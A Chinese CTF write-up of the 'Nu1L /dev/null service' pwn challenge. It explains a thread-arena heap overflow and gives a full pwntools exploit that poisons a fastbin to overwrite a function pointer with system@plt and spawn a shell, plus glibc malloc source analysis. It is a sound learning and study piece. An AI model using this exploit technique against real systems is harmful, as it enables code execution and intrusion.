0x00 背景
这道题当时并没有做出来, 不过上周末社团内部分享了一下, 于是之后自己也复现了一下, 花了不少时间, 也学到了不少知识. 写一篇文章记录一下.
0x01 程序分析
main 函数:
// Hex-Rays pseudocode of the challenge's entry point: read one line as a
// password, compare it with a fixed string, then run start_routine on a new
// thread and wait for that thread to finish.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
pthread_t newthread; // [rsp+28h] [rbp-118h]
// `s` is typed as a single char by the decompiler, but it is used below as a
// 0x100-byte buffer (memset of 0x100 bytes, fgets of up to 256 bytes).
char s; // [rsp+30h] [rbp-110h]
unsigned __int64 canary; // [rsp+138h] [rbp-8h]
canary = __readfsqword(0x28u);
// Mode 2 is _IONBF on glibc, i.e. both streams become unbuffered.
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
memset(&s, 0, 0x100uLL);
puts("Enter secret password: ");
if ( fgets(&s, 256, stdin) == 0LL )
exit(1);
sleep(3u);
// fgets keeps the trailing newline, hence the "\n" inside the expected string.
if ( strcmp(&s, "i'm ready for challenge\n") )
{
puts("Access denied");
exit(1);
}
// NOTE(review): pthread_create reports failure with a positive error number,
// so this `< 0` test presumably never fires -- confirm against the binary.
if ( pthread_create(&newthread, 0LL, (void *(*)(void *))start_routine, 0LL) < 0 ) // spawn the worker thread
{
puts("Internal error, contact admin.");
exit(1);
}
pthread_join(newthread, 0LL);
return 0LL;
}
start_routine:
// Hex-Rays pseudocode of the worker thread: prints a banner, then serves a
// menu loop. Action 1 allocates `padblock_count` + 1 chunks of `size` bytes
// and optionally fills the last one; action 2 leaves the loop; action 1337
// runs system("/usr/bin/id"); anything else prints "Invalid command.".
__int64 __fastcall start_routine(void *a1)
{
int i; // [rsp+14h] [rbp-1Ch]
int choice; // [rsp+18h] [rbp-18h]
int size; // [rsp+1Ch] [rbp-14h]
int padblock_count; // [rsp+20h] [rbp-10h]
void *padblock_ptr; // [rsp+28h] [rbp-8h]
write(1, "***************************************\n", 0x28uLL);
write(1, "* Welcome to Nu1L's /dev/null service *\n", 0x28uLL);
write(1, "***************************************\n", 0x28uLL);
write(1, "1. use /dev/null service\n", 0x19uLL);
write(1, "2. exit\n", 8uLL);
// Global function pointer, invoked after every filled allocation below.
g_func_ptr = (__int64 (__fastcall *)(_QWORD, _QWORD))write_sth;
while ( 1 )
{
// Inner loop: keeps serving action 1; any other choice breaks out to the
// dispatch at the bottom of the outer loop.
while ( 1 )
{
write(1, "Action: ", 8uLL);
choice = get_input_num();
if ( choice != 1 )
break;
write(1, "Size: ", 6uLL);
size = get_input_num();
if ( size >= 0 && size <= 0x4000 )
{
write(1, "Pad blocks: ", 0xCuLL);
padblock_count = get_input_num();
if ( padblock_count >= 0 && padblock_count <= 1000 )
{
// Padding allocations: the returned pointers are discarded, so these
// chunks are never freed.
for ( i = 0; i < padblock_count; ++i )
malloc(size);
padblock_ptr = malloc(size);
write(1, "Content? (0/1): ", 0x10uLL);
if ( get_input_num() )
{
write(1, "Input: ", 7uLL);
get_input((__int64)padblock_ptr, size); // this function contains the overflow
g_func_ptr(padblock_ptr, size);
}
}
else
{
write(1, "Invalid padblock count.\n", 0x18uLL);
}
}
else
{
write(1, "Invalid size.\n", 0xEuLL);
}
}
if ( choice == 2 )
break;
if ( choice == 1337 )
system("/usr/bin/id"); // system() is already available in the binary
else
write(1, "Invalid command.\n", 0x11uLL);
}
// NOTE(review): `fgetxattr` looks like a mis-resolved import name from the
// decompiler (presumably an exit-like routine) -- confirm in the binary.
return fgetxattr(0);
}
get_input:
// Hex-Rays pseudocode of the input helper: keeps calling read() on fd 0 into
// `padblock_ptr + i` until at least `size` bytes have been received, and
// returns the number of bytes received.
size_t __fastcall get_input(__int64 padblock_ptr, size_t size)
{
size_t result; // rax
int v3; // [rsp+1Ch] [rbp-14h]
size_t i; // [rsp+20h] [rbp-10h]
for ( i = 0LL; ; i += v3 )
{
result = i;
if ( i >= size )
break;
// The length passed to read() is always the full `size`, not the remaining
// `size - i`, so after a short first read a later read can write up to
// `size` more bytes starting at offset `i` -- past the end of the buffer.
v3 = read(0, (void *)(padblock_ptr + i), size);
if ( v3 <= 0 )
{
write(1, "I/O error\n", 0xAuLL);
// NOTE(review): `fgetxattr` is presumably a mis-resolved exit-like import;
// confirm in the binary.
fgetxattr(1u);
}
}
return result;
}
这个函数里面存在明显的溢出: read 每次请求的长度始终是 size, 而不是剩余的 size - i. 比如 size = 100, 那么我第一次输入90个字符, 第二次还可以输入100个字符, 总共可以写入190个字节.
综上, 这道题是一道堆溢出的题目. 而漏洞则是和线程有关
0x02 漏洞分析
经过debug我们可以知道线程的堆是通过mmap映射到紧邻libc低地址处的. 而且线程的堆的初始大小为132KB, 当这些堆块耗尽时ptmalloc会首先考虑向高地址处扩展堆块的大小, 但是如果扩展失败(比如高地址处已经有libc在使用了)就会重新用mmap新映射一个堆块, 而新映射的堆块的地址就在原来堆块的低地址处!(具体参考文末的glibc malloc分析) 所以我们的思路就是首先耗尽可扩展的堆块空间, 然后利用新的堆块在低地址这一点, 通过程序存在的溢出将 thread arena 的某个 fast bin 覆盖为 bss 段中的一个地址, 从而在bss段分配一个fake chunk, 进而将 start_routine 中使用的 g_func_ptr 修改为 system 的plt表地址, 最终达到调用 system("/bin/sh") getshell 的目的.
利用过程
1. 确定需要先malloc多少空间
这儿遇见的一个坑(参考文末), 我是根据一次次debug测试出来究竟需要首先malloc多大的空间, 思路非常无脑--不断地调用malloc, 同时使用 gdb 的vmmap观察
内存分布情况, 直到逼近正确的大小.
2. fast bin attack
我选择了 覆盖 fast_bin, 于是首先得找到一个符合条件的地址. ptmalloc 对 chunk 的size会检查的.
ptmalloc 首先会根据申请的 size计算index:
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
然后根据得到的index从对应的fastbin中取出一个chunk的指针, 然后还会计算这个chunk的size是否正确:
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
//...
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr (check_action, errstr, chunk2mem (victim), av);
return NULL;
}
我是在 0x60201d 处找到合适的size的:
于是我就把 fast bin 覆盖为 0x60201d, 然后再malloc就可以得到一个用户数据从 0x60202d 开始的chunk了, 大小为0x60. 于是我们就可以写入"/bin/sh"并覆盖 g_func_ptr, 之后程序调用 g_func_ptr(padblock_ptr, size); 就可以拿到shell啦~
exp:
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import sys
wait = 0.3
def use(Size, Num, flag):
    """Drive one "use /dev/null service" round of the target's menu.

    Size -- value sent at the "Size: " prompt.
    Num  -- value sent at the "Pad blocks: " prompt.
    flag -- 0 answers "0" at "Content? (0/1): " and returns immediately;
            any other value answers "1" and then waits for the "Input: "
            prompt, leaving it to the caller to send the actual payload.

    Uses the module-level pwntools tube ``io``.
    """
    io.recvuntil('Action: ')
    io.sendline(str(1))
    io.recvuntil('Size: ')
    io.sendline(str(Size))
    io.recvuntil('Pad blocks: ')
    io.sendline(str(Num))
    io.recvuntil('(0/1): ')
    if flag == 0:
        io.sendline(str(0))
    else:
        io.sendline(str(1))
        # The target only prints "Input: " when content was requested.
        io.recvuntil('Input: ')
def quit():
    """Select menu action 2, which makes the target leave its menu loop.

    Uses the module-level pwntools tube ``io``. Note that this name shadows
    the interactive ``quit`` builtin within this script.
    """
    io.recvuntil('Action: ')
    io.sendline(str(2))
context.binary = "./null"
elf = ELF('./null')
io = process('./null')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# main() compares the whole fgets() line, so the trailing newline is part of
# the expected password.
psd = "i'm ready for challenge\n"
io.recvuntil('Enter secret password: \n')
io.send(psd)

# Heap grooming: bulk allocations without content. The counts were found
# empirically by watching the memory map while allocating.
for i in range(0, 12):
    use(0x4000, 1000, 0)
use(0x4000, 261, 0)
use(0x3000, 0, 0)

# Last chunk before the overflow. The first line is shorter than 0xfe0 bytes,
# so get_input() issues another read() of 0xfe0 bytes at the current offset;
# the second line is what runs past the end of the chunk.
use(0xfe0, 0, 1)
io.sendline('a' * 0xfd0 + '\x00')
sleep(wait)
# Overflow payload: filler followed by ten copies of the fake chunk address
# 0x60201d, intended to land on the thread arena's fastbin slots.
io.sendline('b' * (0x80-34) + p64(0x300000000) + 10*p64(0x60201d) + '\x00')

system_plt = 0x0000000000400978
# This request is served from the poisoned fastbin, i.e. from the bss.
use(0x60, 0, 1)
sleep(wait)
# "/bin/sh\x00" padded to 11 bytes so that system_plt lands on g_func_ptr;
# ljust() pads with spaces, hence the explicit NUL terminator.
io.sendline(("/bin/sh\x00".ljust(11) + p64(system_plt) + 'b'*16).ljust(0x60))
io.interactive()
# gdb.attach(io)
# 0x000000000060201d  fake chunk address placed into the fastbin
# 0x0000000000602038  = 0x60202d + 11, presumably the address of g_func_ptr
收获:
学到了新的操作的同时也顺便复习了一波fast bin attack. 大概看了一遍malloc源码. 熟悉了pwndbg的使用, 有些情况下确实比 ida 要方便不少.
收获很多. 需要学的也很多. 继续加油吧
附:
1. 遇见的坑
1.1 偏移问题
wp中提到的方法是malloc大量的空间使得thread的heap因为libc的阻挡没有办法继续向高地址处增长, 进而从低地址处重新map一块空间, 再利用堆溢出漏洞来覆盖malloc_state. 那么究竟需要分配多大的空间呢? 难道每次需要分配的空间都是固定的吗? 于是我试着运行了几次程序, 并计算 thread heap 和离其最近的libc之间的偏移. 得到几次结果如下:
0x7fb314000020, 0x7fb31ac26000, 0x6c25fe0
0x7fc500000020, 0x7fc504f05000, 0x4f04fe0
0x7f2d08000020, 0x7f2d0d46b000, 0x546afe0
第一个是thread_arena的地址, 第二个是libc地址, 第三个是偏移. 我发现每次的偏移都是不固定的.........那么我怎么知道要分配多大的空间呢?
后来经过观察发现其实踩到了一个坑, 虽然偏移不同, 但是中间使用malloc分配的空间却是相同的:
0x7f2d08000000 0x7f2d0bffd000 rw-p 3ffd000 0
0x7f2d0bffd000 0x7f2d0c000000 ---p 3000 0
0x7f2d0cc6a000 0x7f2d0cc6b000 ---p 1000 0
0x7f2d0cc6b000 0x7f2d0d46b000 rw-p 800000 0
0x7f2d0d46b000 0x7f2d0d62b000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff810000000 0x7ff813ffd000 rw-p 3ffd000 0
0x7ff813ffd000 0x7ff814000000 ---p 3000 0
0x7ff8170ff000 0x7ff817100000 ---p 1000 0
0x7ff817100000 0x7ff817900000 rw-p 800000 0
0x7ff817900000 0x7ff817ac0000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7f57bc000000 0x7f57bfffd000 rw-p 3ffd000 0
0x7f57bfffd000 0x7f57c0000000 ---p 3000 0
0x7f57c3c5a000 0x7f57c3c5b000 ---p 1000 0
0x7f57c3c5b000 0x7f57c445b000 rw-p 800000 0
0x7f57c445b000 0x7f57c461b000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7f495c000000 0x7f495fffd000 rw-p 3ffd000 0
0x7f495fffd000 0x7f4960000000 ---p 3000 0
0x7f4960640000 0x7f4960641000 ---p 1000 0
0x7f4960641000 0x7f4960e41000 rw-p 800000 0
0x7f4960e41000 0x7f4961001000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
每组的第一行是thread heap 的空间. 以第一组为例: 我实际malloc的空间只是0x3ffd000 + 0x800000, 剩下的0x3000 + 0x1000 应该属于freed chunk(因为每次都是malloc(0x4000)), 每次运行这些值都是相等的. 而整体偏移不等的原因是有些空间没有显示出来, 而且大小是随机的. 比如第一组中的0x7f2d0c000000 到 0x7f2d0cc6a000, 我尝试访问这其中的地址会得到 Cannot access memory at address 提示. 不管这些空间是干什么的, 显然现在知道每次需要malloc的空间大小都是确定的了.
1.2 pwntools io.sendline() 问题
pwntools 连续两次使用 send()/sendline() 之间 最好调用一下 sleep()..... 至于时间我一般用0.3s, 其实最好是中间加个 recvuntil(). 否则可能会发生一些莫名其妙的错误,而且找起来也非常麻烦........
1.3 "/bin/sh" 问题
因为我需要在地址前面填充11个字符, 所以我使用了 "/bin/sh".ljust(11), 然后就getshell失败了.......把它改成 "/bin/sh\x00".ljust(11) 就好使了..... 因为 ljust() 默认使用 '\x20' (空格)来填充, 而不是 '\x00', 不加结束符的话传给 system 的字符串后面会多出几个空格和后续的地址字节.
2. glibc malloc分析
首先贴上原文的描述:
The only way to bypass this is if we made mprotect fail. So , if we made our heap segment close to a different memory segment. Normally, its above a non-readable,writable and executable page so that it can easily extend into it. But if we spam alloc to make it above a libc segment, and then overwrite top chunk, we can trigger _int_free.
With this, we can do unsorted bin attack on known addresses (like in bss ), and also in the threads arena (partial overwrites) Unfortunately , that lead nowhere.
If we spam mallocs, then we can make possible a certain case where the mmap segments are continuous with each other, and the segment where we malloc will be right above the thread_arena, hence we will overflow into thread_arena.
个人感觉说的太简单了......反正我是看半天没看懂到底原理是什么, 现在就具体分析一下.
首先看malloc.c中的源码.
首先调用的是 __libc_malloc, 然后在其中调用 _int_malloc. 代码太长而且和本题关系不大我就不贴了....
在 _int_malloc 中当ptmalloc检查发现top chunk已经无法满足需要分配的块的大小的时候就会调用 sysmalloc 函数来向系统申请更多的空间:
#malloc.c sysmalloc
if (av != &main_arena)
{
heap_info *old_heap, *heap;
size_t old_heap_size;
/* First try to extend the current heap. */
old_heap = heap_for_ptr (old_top);
old_heap_size = old_heap->size;
if ((long) (MINSIZE + nb - old_size) > 0
&& grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
{
av->system_mem += old_heap->size - old_heap_size;
arena_mem += old_heap->size - old_heap_size;
set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
| PREV_INUSE);
}
else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
{
/* Use a newly allocated heap. */
heap->ar_ptr = av;
heap->prev = old_heap;
av->system_mem += heap->size;
arena_mem += heap->size;
/* Set up the new top. */
top (av) = chunk_at_offset (heap, sizeof (*heap));
set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
/* Setup fencepost and free the old top chunk with a multiple of
MALLOC_ALIGNMENT in size. */
/* The fencepost takes at least MINSIZE bytes, because it might
become the top chunk again later. Note that a footer is set
up, too, although the chunk is marked in use. */
old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
if (old_size >= MINSIZE)
{
set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
_int_free (av, old_top, 1);
}
首先是调用 grow_heap 看能否向高地址处扩充现有堆的大小, 如果扩容失败的话就会调用 new_heap 来新map一块空间作为堆. 下面以实例分析.
对于如下代码:
gcc -g -o test test.c -lpthread
/* Per thread arena example. */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/types.h>
/*
 * Thread body for the per-thread-arena demo.
 *
 * Performs a series of malloc(0x10000) calls and prints selected pointers so
 * that the growth of the heap can be followed in a debugger. The allocations
 * are intentionally never freed. `arg` is unused.
 *
 * Returns NULL; the caller collects this value through pthread_join(), so the
 * function must not fall off its end without returning something.
 */
void* threadFunc(void* arg) {
    void *ptr;

    (void)arg;

    ptr = malloc(0x10000);
    printf("11ptr: %p\n", ptr);
    ptr = malloc(0x10000);
    printf("12ptr: %p\n", ptr);
    ptr = malloc(0x10000);
    printf("21ptr: %p\n", ptr);
    ptr = malloc(0x10000);
    printf("22ptr: %p\n", ptr);

    /* Bulk allocations whose pointers are deliberately discarded. */
    for (int i = 0; i < 0x3fc; ++i) {
        malloc(0x10000);
    }

    ptr = malloc(0x10000);
    printf("31ptr: %p\n", ptr);
    ptr = malloc(0x10000);
    printf("32ptr: %p\n", ptr);

    return NULL;
}
/*
 * Demo driver: run threadFunc on a separate thread and wait for it.
 * Returns 0 on success, -1 if the thread cannot be created or joined.
 */
int main() {
    pthread_t worker;
    void *exit_value;

    if (pthread_create(&worker, NULL, threadFunc, NULL) != 0) {
        printf("Thread creation error\n");
        return -1;
    }

    if (pthread_join(worker, &exit_value) != 0) {
        printf("Thread join error\n");
        return -1;
    }

    return 0;
}
编译后运行查看空间变化情况:
这是第一次malloc后的空间情况, 方框标出的就是malloc的部分.查看地址0x7ffff0000000处发现果然是heapinfo, 而0x7ffff0000020处就是thread_arena 的malloc_state实例
malloc/arena.c heap_info
/* Header record describing one heap: the arena it belongs to, a link to the
   previous heap, and its current and mprotect-ed sizes. */
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
继续运行程序: 又经过3次malloc之后原来的0x31000的空间被用光了, 于是ptmalloc调用了 grow_heap 来扩容heap:
扩容到了0x41000.
可以看到还剩0x3fbf000的空间, 如果我们把这些空间也都耗尽会发生什么呢?我们继续运行:
这是我们耗尽0x3fbf000的空间后又继续malloc的结果: ptmalloc调用了 new_heap 在原来的heap的低地址处又分配了一个新的heap, 我们查看这个块的头部:
果然是heap_info实例, ar_ptr指向原来的malloc_state实例, prev 指向原来的heap_info.
于是我们再将剩下的0x3fcf000耗尽就可以利用堆溢出覆盖原来的malloc_state实例了.
我的例子中两个heap之间并不是紧邻的, 而是隔了一块空间(应该是尚未被映射), 所以并不能利用溢出覆盖后面的heap. 不过好在这道题目中是紧邻的. 至于为什么会有这块空间我也不清楚.....可能和分配的大小有关吧....不过这儿我们关心的是 sysmalloc 的逻辑, 这个就不管了.